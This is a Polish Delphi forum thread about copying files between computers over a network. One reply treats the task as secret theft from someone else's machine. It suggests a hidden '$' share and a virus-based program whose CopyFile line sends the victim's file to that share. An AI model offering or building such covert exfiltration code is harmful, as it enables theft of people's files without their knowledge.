Jak skopiowac plik przez siec ?

0

Ludzie !! jak skopiowac plik np. exe przez siec miedzy 2 kompami uzywajac delphi (jak to napisac we elasnym programie ?) prosze o odpowiedz na [email protected] lub na forum ! na razie !

0

nawet nie zauważyłem tego topicu :) Otóż przez Sockety sam nie wiem (jest topic) ale jest inne dość proste rowiązanie jeżeli używasz delphi. Sądzą po twej ksywce raczej to ma być potajemne a jak potajemne to raczej do siebie od kogoś. Zaczynamy:
1.Na swoim komputerze udostępnij jakiś folder ale zrób go ukrytym przez dodanie znaku $ na końcu nazwy udostępnij jako czy tym podobnie.
2. W swoim programie, który możesz zrobić na bazie wirusa Hiv , dodaj linijke
CopyFile(PChar('c:\jakis.plik'),PChar('TwojKomputer\Udzial$\jakis.plik'),False) //false daje to, że nadpisuje istniejący plik

To koniec. Nie proste i chyba jasne :).--Pozdrowienia,
Imperior

0

U mnie nie działa twój przykład, Imperior :(--Pozdrawiam
Delphi 6.0

0

uses URLMon;

procedure TForm1.KopiujClick(Sender: TObject);
begin
if URLDownloadToFile(Nil,'http://www.adres.pl/jakisplik.zip', 'c:\docelowy.zip',0,Nil)&lt&gt 0 then
ShowMessage('Wystąpił błąd podczas ściągania');
end;

Może być?--Pracuję w Delphi 5

Pozdrawiam
RockY
xrocky@o2,pl

0

Zapraszam na www.delphirulez.prv.pl tam wrzuciłem wyczerpujący opis i przykład do ściągnięcia--DELPHIRULEZ

1 użytkowników online, w tym zalogowanych: 0, gości: 1